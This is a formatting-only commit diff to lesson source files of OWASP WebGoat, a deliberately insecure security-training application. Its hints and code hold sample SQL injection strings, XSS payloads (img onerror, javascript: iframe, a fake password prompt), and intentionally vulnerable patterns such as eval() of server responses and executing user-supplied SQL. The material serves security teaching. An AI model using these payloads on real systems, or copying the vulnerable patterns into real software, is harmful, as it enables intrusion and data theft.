Formatting according to OWASP WebGoat Java Style

git-svn-id: http://webgoat.googlecode.com/svn/trunk@359 4033779f-a91e-0410-96ef-6bf7bf53c507

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/AbstractLesson.java

@@ -11,7 +11,6 @@ import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -504,9 +503,9 @@ public abstract class AbstractLesson extends Screen implements Comparable<Object
 		{
 			s.setMessage("Could not find source file");
 			src = ("Could not find the source file or source file does not exist.<br/>"
-					+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress() + "?subject=Source "
+					+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress()
-					+ getSourceFileName() + " not found. Lesson: " + s.getCurrentLesson().getLessonName() + "\">" + 
+					+ "?subject=Source " + getSourceFileName() + " not found. Lesson: "
-					s.getWebgoatContext().getFeedbackAddress() + "</a>");
+					+ s.getCurrentLesson().getLessonName() + "\">" + s.getWebgoatContext().getFeedbackAddress() + "</a>");
 		}
 
 		Html html = new Html();
@@ -537,9 +536,9 @@ public abstract class AbstractLesson extends Screen implements Comparable<Object
 		{
 			s.setMessage("Could not find the solution file");
 			src = ("Could not find the solution file or solution file does not exist.<br/>"
-					+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress() + "?subject=Solution "
+					+ "Send this message to: <a href=\"mailto:" + s.getWebgoatContext().getFeedbackAddress()
-					+ getLessonSolutionFileName() + " not found. Lesson: " + s.getCurrentLesson().getLessonName() + "\">" + 
+					+ "?subject=Solution " + getLessonSolutionFileName() + " not found. Lesson: "
-					s.getWebgoatContext().getFeedbackAddress() + "</a>");
+					+ s.getCurrentLesson().getLessonName() + "\">" + s.getWebgoatContext().getFeedbackAddress() + "</a>");
 		}
 
 		// Solutions are html files

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java

@@ -81,7 +81,8 @@ public class BackDoors extends SequentialLessonAdapter
 
 	private void addDBEntriesToEC(ElementContainer ec, ResultSet rs)
 	{
-		try {
+		try
+		{
 			if (rs.next())
 			{
 				Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(1);
@@ -112,7 +113,8 @@ public class BackDoors extends SequentialLessonAdapter
 				}
 				ec.addElement(t);
 			}
-		} catch (SQLException e) {
+		} catch (SQLException e)
+		{
 			// TODO Auto-generated catch block
 			e.printStackTrace();
 		}
@@ -166,8 +168,7 @@ public class BackDoors extends SequentialLessonAdapter
 			userInput = SELECT_ST + userInput;
 			String[] arrSQL = userInput.split(";");
 			Connection conn = DatabaseUtilities.getConnection(s);
-			Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+			Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-														ResultSet.CONCUR_READ_ONLY);
 
 			if (arrSQL.length == 2)
 			{
@@ -179,7 +180,6 @@ public class BackDoors extends SequentialLessonAdapter
 			ResultSet rs = statement.executeQuery(arrSQL[0]);
 			addDBEntriesToEC(ec, rs);
 
-
 		}
 		return ec;
 	}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java

@@ -144,7 +144,6 @@ public class BlindSqlInjection extends LessonAdapter
 		return new StringElement("By Chuck Willis");
 	}
 
-
 	/**
 	 * Gets the hints attribute of the DatabaseFieldScreen object
 	 * 
@@ -174,11 +173,9 @@ public class BlindSqlInjection extends LessonAdapter
 				+ ") , 1 , 1) ) < 77 ); "
 				+ "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
 				+ "invalid then answer is no.");
-			hints.add("Another example: is the second character of the first_name of userid "
+		hints.add("Another example: is the second character of the first_name of userid " + TARGET_ACCT_NUM
-					+ TARGET_ACCT_NUM
 				+ " greater than 'm' (ascii 109)? "
-					+ "<br><br>101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid="
+				+ "<br><br>101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=" + TARGET_ACCT_NUM
-					+ TARGET_ACCT_NUM
 				+ ") , 2 , 1) ) > 109 ); "
 				+ "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
 				+ "invalid then answer is no.");

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/Challenge2Screen.java

@@ -282,7 +282,6 @@ public class Challenge2Screen extends SequentialLessonAdapter
 	 */
 	/*
 	 * (non-Javadoc)
-	 * 
 	 * @see lessons.LessonAdapter#doStage3(session.WebSession)
 	 */
 	protected Element doStage3(WebSession s) throws Exception

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/ClientSideFiltering/ClientSideFiltering.java

@@ -96,8 +96,6 @@ public class ClientSideFiltering extends SequentialLessonAdapter
 			t.setID("hiddenEmployeeRecords");
 			t.setStyle("display: none");
 
-			
-
 			workspaceDiv.addElement(t);
 
 			t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
@@ -334,7 +332,8 @@ public class ClientSideFiltering extends SequentialLessonAdapter
 
 		hints.add("Stage 1: Use Firebug to find where the information is stored on the client side.");
 
-		hints.add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
+		hints
+				.add("Stage 1: Examine the hidden table to see if there is anyone listed who is not in the drop down menu.");
 
 		hints.add("Stage 1: Look in the last row of the hidden table.");
 

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/ConcurrencyCart.java

@@ -154,9 +154,7 @@ public class ConcurrencyCart extends LessonAdapter
 	}
 
 	/*
-	 * ********************************************************************* ******************
+	 * PURCHASING PAGE
-	 * PURCHASING PAGE **********************************
-	 * *********************************************************************
 	 */
 
 	private ElementContainer createPurchaseContent(WebSession s, int quantity1, int quantity2, int quantity3,
@@ -303,9 +301,7 @@ public class ConcurrencyCart extends LessonAdapter
 	}
 
 	/*
-	 * ********************************************************************* ******************
+	 * CONFIRMATION PAGE
-	 * CONFIRMATION PAGE ********************************
-	 * *********************************************************************
 	 */
 
 	private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)
@@ -420,9 +416,7 @@ public class ConcurrencyCart extends LessonAdapter
 	}
 
 	/*
-	 * ********************************************************************* ******************
+	 * SHOPPING PAGE
-	 * SHOPPING PAGE **********************************
-	 * *********************************************************************
 	 */
 
 	private ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4)

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java

@@ -99,8 +99,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
 		return Category.XSS;
 	}
 
-	
+	public String getLessonSolutionFileName(WebSession s)
-	public String getLessonSolutionFileName(WebSession s) {
+	{
 		String solutionFileName = null;
 		String stage = getStage(s);
 		solutionFileName = "/lesson_solutions/Lab XSS/Lab " + stage + ".html";
@@ -108,13 +108,15 @@ public class CrossSiteScripting extends GoatHillsFinancial
 	}
 
 	@Override
-	public String getSolution(WebSession s) {
+	public String getSolution(WebSession s)
+	{
 		String src = null;
 
 		try
 		{
 			// System.out.println("Solution: " + getLessonSolutionFileName(s));
-			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))), false);
+			src = readFromFile(new BufferedReader(new FileReader(s.getWebResource(getLessonSolutionFileName(s)))),
+								false);
 		} catch (IOException e)
 		{
 			s.setMessage("Could not find the solution file");
@@ -148,9 +150,9 @@ public class CrossSiteScripting extends GoatHillsFinancial
 
 		// Stage 3
 
-
 		// Stage 4
-		hints.add("Stage4: Examine content served in response to form submissions looking for data taken from the form.");
+		hints
+				.add("Stage4: Examine content served in response to form submissions looking for data taken from the form.");
 		hints.add("Stage4: There is a class called HtmlEncoder in org.owasp.webgoat.util");
 		// Stage 5
 		hints
@@ -179,8 +181,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
 			}
 			else if (STAGE2.equals(stage))
 			{
-				instructions = "Stage 2: Block Stored XSS using Input Validation.<br><br>" +
+				instructions = "Stage 2: Block Stored XSS using Input Validation.<br><br>"
-				"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
 						+ "Implement a fix to block the stored XSS before it can be written to the database. "
 						+ "Repeat stage 1 as 'Eric' with 'David' as the manager.  Verify that 'David' is not affected by the attack.";
 			}
@@ -192,8 +194,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
 			}
 			else if (STAGE4.equals(stage))
 			{
-				instructions = "Stage 4: Block Stored XSS using Output Encoding.<br><br>" +
+				instructions = "Stage 4: Block Stored XSS using Output Encoding.<br><br>"
-				"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
 						+ "Implement a fix to block XSS after it is read from the database. "
 						+ "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack.";
 			}
@@ -205,8 +207,8 @@ public class CrossSiteScripting extends GoatHillsFinancial
 			}
 			else if (STAGE6.equals(stage))
 			{
-				instructions = "Stage 6: Block Reflected XSS using Input Validation.<br><br>" +
+				instructions = "Stage 6: Block Reflected XSS using Input Validation.<br><br>"
-				"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
 						+ "Implement a fix to block this reflected XSS attack. "
 						+ "Repeat step 5.  Verify that the attack URL is no longer effective.";
 			}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java

@@ -97,8 +97,8 @@ public class EditProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{
@@ -141,8 +141,8 @@ public class EditProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/FindProfile.java

@@ -171,8 +171,8 @@ public class FindProfile extends DefaultLessonAction
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */
 					setRequestAttribute(s, getLessonName() + "." + CrossSiteScripting.EMPLOYEE_ID, Integer.toString(id));
 				}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/UpdateProfile.java

@@ -130,7 +130,6 @@ public class UpdateProfile extends DefaultLessonAction
 		String disciplinaryActionNotes = request.getParameter(CrossSiteScripting.DISCIPLINARY_NOTES);
 		String personalDescription = request.getParameter(CrossSiteScripting.DESCRIPTION);
 
-
 		Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2,
 				manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes,
 				personalDescription);

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/ViewProfile.java

@@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons.CrossSiteScripting;
 import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.sql.Statement;
-
 import org.apache.ecs.xhtml.html;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction;
 import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial;
@@ -16,7 +15,6 @@ import org.owasp.webgoat.session.UnauthorizedException;
 import org.owasp.webgoat.session.ValidationException;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.util.HtmlEncoder;
-
 import com.sun.corba.se.spi.activation.Server;
 
 
@@ -92,7 +90,6 @@ public class ViewProfile extends DefaultLessonAction
 	{
 		Employee profile = null;
 
-
 		// Query the database for the profile data of the given employee
 		try
 		{
@@ -108,15 +105,15 @@ public class ViewProfile extends DefaultLessonAction
 					// Note: Do NOT get the password field.
 					profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"),
 							answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results
-									.getString("title"), answer_results.getString("phone"), 
+									.getString("title"), answer_results.getString("phone"), answer_results
-									answer_results.getString("address1"), answer_results.getString("address2"), answer_results
+									.getString("address1"), answer_results.getString("address2"), answer_results
 									.getInt("manager"), answer_results.getString("start_date"), answer_results
 									.getInt("salary"), answer_results.getString("ccn"), answer_results
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{
@@ -132,7 +129,6 @@ public class ViewProfile extends DefaultLessonAction
 		return profile;
 	}
 
-
 	public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException
 	{
 		// Query the database to determine if this employee has access to this function
@@ -163,10 +159,9 @@ public class ViewProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 
-
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DBCrossSiteScripting/DBCrossSiteScripting.java

@@ -124,8 +124,8 @@ public class DBCrossSiteScripting extends GoatHillsFinancial
 			String stage = getStage(s);
 			if (STAGE1.equals(stage))
 			{
-				instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br><br>"+
+				instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.<br><br>"
-				"<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
+						+ "<b><font color=blue> THIS LESSON ONLY WORKS WITH THE DEVELOPER VERSION OF WEBGOAT</font></b><br/><br/>"
 						+ "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page.  "
 						+ "Verify that 'Jerry' is affected by the attack. "
 						+ "A sample JavaScript snippet you can use is: &lt;SCRIPT&gt;alert('bang!');&lt;/SCRIPT&gt;.";

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOMInjection.java

@@ -74,7 +74,6 @@ public class DOMInjection extends LessonAdapter
 				s.getResponse().setHeader("Cache-Control", "no-cache");
 				PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
 
-
 				out.print("document.forms[0].SUBMIT.disabled = false;");
 				out.flush();
 				out.close();
@@ -91,10 +90,10 @@ public class DOMInjection extends LessonAdapter
 
 		setContent(form);
 	}
+
 	protected Element createContent(WebSession s)
 	{
 
-
 		ElementContainer ec = new ElementContainer();
 
 		if (s.getRequest().getMethod().equalsIgnoreCase("POST"))
@@ -103,9 +102,7 @@ public class DOMInjection extends LessonAdapter
 		}
 
 		String lineSep = System.getProperty("line.separator");
-		String script = "<script>" + lineSep
+		String script = "<script>" + lineSep + "function validate() {" + lineSep
-				+ "function validate() {" 
-				+ lineSep
 				+ "var keyField = document.getElementById('key');" + lineSep + "var url = '" + getLink()
 				+ "&from=ajax&key=' + encodeURIComponent(keyField.value);" + lineSep
 				+ "if (typeof XMLHttpRequest != 'undefined') {" + lineSep + "req = new XMLHttpRequest();" + lineSep
@@ -113,18 +110,13 @@ public class DOMInjection extends LessonAdapter
 				+ lineSep + "   }" + lineSep + "   req.open('GET', url, true);" + lineSep
 				+ "   req.onreadystatechange = callback;" + lineSep + "   req.send(null);" + lineSep + "}" + lineSep
 				+ "function callback() {" + lineSep + "    if (req.readyState == 4) { " + lineSep
-				+ "        if (req.status == 200) { " + lineSep + "            var message = req.responseText;" + lineSep
+				+ "        if (req.status == 200) { " + lineSep + "            var message = req.responseText;"
-				+ "   var result = req.responseXML.getElementsByTagName('reward');" + lineSep
+				+ lineSep + "   var result = req.responseXML.getElementsByTagName('reward');" + lineSep
-				+ "    var messageDiv = document.getElementById('MessageDiv');" + lineSep
+				+ "    var messageDiv = document.getElementById('MessageDiv');" + lineSep + "  try {" + lineSep
-				+ "  try {" + lineSep
 				+ "			 eval(message);" + lineSep + "    " + lineSep
-				+ "        messageDiv.innerHTML = 'Correct licence Key.' " + lineSep
+				+ "        messageDiv.innerHTML = 'Correct licence Key.' " + lineSep + "      }" + lineSep
-				+ "      }" + lineSep
+				+ "  catch(err)" + lineSep + "  { " + lineSep + "    messageDiv.innerHTML = 'Wrong license key.'"
-				+ "  catch(err)" + lineSep
+				+ lineSep + "} " + lineSep + "    }}}" + lineSep + "</script>" + lineSep;
-				+ "  { " + lineSep
-				+ "    messageDiv.innerHTML = 'Wrong license key.'" + lineSep
-				+		"} " + lineSep
-				+ "    }}}" + lineSep + "</script>" + lineSep;
 
 		ec.addElement(new StringElement(script));
 		ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat Registration Page:")));
@@ -147,7 +139,6 @@ public class DOMInjection extends LessonAdapter
 
 		t1.addElement(tr);
 
-
 		tr = new TR();
 		Input b = new Input();
 		b.setType(Input.SUBMIT);

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DOMXSS.java

@@ -183,13 +183,16 @@ public class DOMXSS extends SequentialLessonAdapter
 
 		hints.add("Stage 2: Try entering the following: " + "<img src=x onerror=;;alert('XSS') />");
 
-		hints.add("Stage 3: Try entering the following: " + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>");
+		hints.add("Stage 3: Try entering the following: "
+				+ "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>");
 
-		hints.add("Stage 4: Try entering the following: "
+		hints
+				.add("Stage 4: Try entering the following: "
 						+ "Please enter your password:<BR><input type = \"password\" name=\"pass\"/><button "
 						+ "onClick=\"javascript:alert('I have your password: ' + pass.value);\">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>");
 
-		hints.add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version).");
+		hints
+				.add("Stage 5: You will find the JavaScripts in tomcat\\webapps\\WebGoat\\javascript (Standart Version) or in WebContent\\javascript (Developer Version).");
 		// Attack Strings:
 
 		// <IMG SRC="images/logos/owasp.jpg"/>
@@ -201,7 +204,8 @@ public class DOMXSS extends SequentialLessonAdapter
 		// Please enter your password:<BR><input type = "password" name="pass"/><button
 		// onClick="javascript:alert('I
 		// have your password: ' +
-		// pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
+		// pass.value);
+		// ">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>
 
 		return hints;
 	}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/DangerousEval.java

@@ -4,7 +4,6 @@ package org.owasp.webgoat.lessons;
 import java.util.ArrayList;
 import java.util.List;
 import java.util.regex.Pattern;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.html.A;

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/EditProfile.java

@@ -95,8 +95,8 @@ public class EditProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/FindProfile.java

@@ -139,8 +139,8 @@ public class FindProfile extends DefaultLessonAction
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */
 					setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer.toString(id));
 				}

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java

@@ -104,8 +104,8 @@ public class ViewProfile extends DefaultLessonAction
 									.getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results
 									.getString("disciplined_notes"), answer_results.getString("personal_description"));
 					/*
-					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " +
+					 * System.out.println("Retrieved employee from db: " + profile.getFirstName() +
-					 * profile.getLastName() + " (" + profile.getId() + ")");
+					 * " " + profile.getLastName() + " (" + profile.getId() + ")");
 					 */}
 			} catch (SQLException sqle)
 			{

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/HttpOnly.java

@@ -294,8 +294,8 @@ public class HttpOnly extends LessonAdapter
 		t.addElement(tr);
 
 		/*
-		 * tr.addElement(new TD(new StringElement("<strong>Status:</strong> " )));
+		 * tr.addElement(new TD(new StringElement("<strong>Status:</strong> " ))); t.addElement(tr);
-		 * t.addElement(tr); if(httpOnly == true) { tr.addElement(new TD(new StringElement("<div
+		 * if(httpOnly == true) { tr.addElement(new TD(new StringElement("<div
 		 * id=\"status\">On</div>"))); } else { tr.addElement(new TD(new StringElement ("<div
 		 * id=\"status\">Off</div>"))); } t.addElement(tr); t.addElement(new TR(new TD(new
 		 * StringElement("<br/>"))));

webgoat/main/project/JavaSource/org/owasp/webgoat/lessons/InsecureLogin.java

@@ -6,7 +6,6 @@ import java.sql.PreparedStatement;
 import java.sql.ResultSet;
 import java.util.ArrayList;
 import java.util.List;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -24,7 +23,6 @@ import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.WebSession;
 
 
-
 public class InsecureLogin extends SequentialLessonAdapter
 {
 
@@ -47,7 +45,8 @@ public class InsecureLogin extends SequentialLessonAdapter
 	}
 
 	@Override
-	protected Element doStage1(WebSession s) throws Exception {
+	protected Element doStage1(WebSession s) throws Exception
+	{
 		String answer = s.getParser().getStringParameter(ANSWER, "");
 		if (answer.equals("sniffy"))
 		{
@@ -58,7 +57,8 @@ public class InsecureLogin extends SequentialLessonAdapter
 	}
 
 	@Override
-	protected Element doStage2(WebSession s) throws Exception {
+	protected Element doStage2(WebSession s) throws Exception
+	{
 		String protocol = s.getParser().getStringParameter(PROTOCOL, "");
 		String yesno = s.getParser().getStringParameter(YESNO, "");
 
@@ -72,6 +72,7 @@ public class InsecureLogin extends SequentialLessonAdapter
 
 	/**
 	 * Creation of the main content
+	 * 
 	 * @param s
 	 * @return Element
 	 */
@@ -83,7 +84,8 @@ public class InsecureLogin extends SequentialLessonAdapter
 		{
 			style sty = new style();
 
-			sty.addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}		.lesson_text {height: 240px;width: 460px;padding-top: 5px;}			#lesson_buttons_bottom {height: 20px;width: 460px;}			#lesson_b_b_left {width: 300px;float: left;}			#lesson_b_b_right input {width: 100px;float: right;}			.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}			.lesson_workspace { }			.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}			.lesson_text_db {color: #0066FF}			#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}			#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}			#lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
+			sty
+					.addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}		.lesson_text {height: 240px;width: 460px;padding-top: 5px;}			#lesson_buttons_bottom {height: 20px;width: 460px;}			#lesson_b_b_left {width: 300px;float: left;}			#lesson_b_b_right input {width: 100px;float: right;}			.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}			.lesson_workspace { }			.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}			.lesson_text_db {color: #0066FF}			#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}			#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}			#lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
 			ec.addElement(sty);
 
 			Div wrapperDiv = new Div();
@@ -121,9 +123,11 @@ public class InsecureLogin extends SequentialLessonAdapter
 
 	/**
 	 * Create content for logging in
+	 * 
 	 * @param ec
 	 */
-	private Element createLogInContent() {
+	private Element createLogInContent()
+	{
 		ElementContainer ec = new ElementContainer();
 		Div loginDiv = new Div();
 		loginDiv.setID("lesson_login");
@@ -146,7 +150,6 @@ public class InsecureLogin extends SequentialLessonAdapter
 		tr2.addElement(td3);
 		tr2.addElement(td4);
 
-
 		TR tr3 = new TR();
 		TD td5 = new TD();
 		td5.setColSpan(2);
@@ -164,9 +167,6 @@ public class InsecureLogin extends SequentialLessonAdapter
 
 	}
 
-
-
-
 	/**
 	 * Gets the category attribute of the ForgotPassword object
 	 * 
@@ -187,17 +187,12 @@ public class InsecureLogin extends SequentialLessonAdapter
 	{
 		List<String> hints = new ArrayList<String>();
 
-		hints.add("Stage 1: Use a sniffer to record " +
+		hints.add("Stage 1: Use a sniffer to record " + "the traffic");
-				"the traffic");
 		hints.add("Stage 1: What Protocol does the request use?");
-		hints.add("Stage 1: What kind of request is started when " +
+		hints.add("Stage 1: What kind of request is started when " + "you click on the button?");
-				"you click on the button?");
+		hints.add("Stage 1: Take a closer look at the HTTP Post request in " + "your sniffer");
-		hints.add("Stage 1: Take a closer look at the HTTP Post request in " +
-				"your sniffer");
 		hints.add("Stage 1: The password field has the name clear_pass");
 
-		
-
 		return hints;
 	}
 
@@ -219,25 +214,22 @@ public class InsecureLogin extends SequentialLessonAdapter
 	}
 
 	@Override
-	public String getInstructions(WebSession s) {
+	public String getInstructions(WebSession s)
+	{
 		int stage = getLessonTracker(s).getStage();
 		String instructions = "";
-		instructions = "<b>For this lesson you need to " +
+		instructions = "<b>For this lesson you need to " + "have a server client setup. Please refer to the"
-		"have a server client setup. Please refer to the" +
+				+ "Tomcat Configuration in the Introduction section.</b><br><br> Stage" + stage + ": ";
-		"Tomcat Configuration in the Introduction section.</b><br><br> Stage" +
-		stage + ": ";
 		if (stage == 1)
 		{
-			instructions += "In this stage you have to sniff the " +
+			instructions += "In this stage you have to sniff the "
-					"password. And answer the question after the login.";
+					+ "password. And answer the question after the login.";
 		}
 		if (stage == 2)
 		{
-			instructions += "Now you have to change to a secure " +
+			instructions += "Now you have to change to a secure " + "connection. The URL should start with https:// "
